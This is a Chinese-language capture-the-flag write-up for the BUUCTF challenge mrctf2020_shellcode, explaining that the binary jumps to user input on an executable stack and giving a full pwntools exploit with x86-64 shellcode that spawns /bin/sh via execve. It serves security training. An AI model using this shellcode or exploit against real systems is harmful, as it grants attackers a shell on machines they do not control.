BUUCTF--mrctf2020_shellcode1

这是一题64位的shellocde题,没啥花招入门题。看下保护:


有可执行的段。接着我们看看IDA:


主函数中无法反汇编,那么我们直接看汇编代码。其实很简单,通过系统调用执行puts函数,然后执行read函数。


正在我想如何覆盖返回地址的时候,发现题目直接帮你搞好了。取buf的的地址(栈上)然后跳转到buf位置执行代码。那么我们直接通过read函数构造shellcode就完成了:

python 复制代码
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
io=process('./mrctf2020_shellcode')

shellcode = '''
    mov rbx,0x68732f6e69622f
    push rbx
    push rsp
    pop rdi
    xor esi,esi
    xor edx,edx
    push 0x3b
    pop rax
    syscall
'''


shellcode=asm(shellcode)

io.recvuntil("magic!")

io.sendline(shellcode)

io.interactive()
相关推荐
xxp432112 分钟前
Qt 网络编程 TCP通信
开发语言·qt
T***u33328 分钟前
PHP在电商中的会员管理
开发语言·wireshark·php·ue4·jina
张丶大帅36 分钟前
JS案例合集
开发语言·javascript·笔记
2301_795167201 小时前
Python 高手编程系列八:缓存
开发语言·python·缓存
极地星光1 小时前
C++链式调用设计:打造优雅流式API
服务器·网络·c++
8***29312 小时前
Go基础之环境搭建
开发语言·后端·golang
Yue丶越2 小时前
【C语言】自定义类型:联合体与枚举
c语言·开发语言
小陈要努力2 小时前
Visual Studio 开发环境配置指南
c++·opengl
程序猿本员2 小时前
5. 实现
c++
csbysj20202 小时前
DOM 节点
开发语言